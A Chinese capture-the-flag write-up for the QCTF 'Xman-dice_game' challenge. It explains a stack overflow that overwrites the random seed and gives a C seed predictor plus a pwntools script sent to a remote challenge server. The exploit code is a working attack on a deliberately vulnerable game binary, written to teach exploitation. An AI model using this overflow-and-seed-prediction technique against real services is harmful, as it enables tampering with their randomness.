WriteUp:QCTF Xman-dice_game

题目描述

QCTF 的 Xman-dice_gmae 题目。

题目本体见这里。

题目逻辑很简单，就是猜骰子点数，一共五十次。

定位溢出点

拖进 IDA 一看溢出点简直就像是故意构造的一样

buf 长度最长为 0x50 但是当输入大于 49 的时候不会被截断，所以我们只要覆盖到之前的 seed 就可以为所欲为了。

同时注意到 seed 跟 buf 相差的偏移是 0x40，所以只要 68 个字符就可以溢出覆盖 seed 了。

Exploit

由于担心 python 的 randint 实现跟 libc 的不太一样，所以我写了个小程序

#include<stdio.h>
#include<stdlib.h>

int main(){
	srand(0xFFFFFFFF);
	for(int i = 0;i < 50 ;i ++)
		printf("%d,",rand()%6 + 1);
	printf("\n");
}

然后根据这个程序的输出构造 Exploit 脚本

from pwn import *

r = remote('47.96.239.28', '9999')

nums = [4,5,5,4,3,1,5,4,3,3,5,4,1,2,2,4,5,4,6,1,4,5,6,4,5,4,2,4,2,5,1,5,3,5,1,5,3,3,2,5,3,4,6,3,3,1,5,2,2,2]

exp = ''.join([ '\xFF' for i in xrange(68)])
r.sendline(exp)
for i in nums:
    r.sendline(str(i))
r.interactive()

后记

实际上只要算准时间理论上不用覆盖 seed 也能 exploit，就是稍微费点功夫罢了。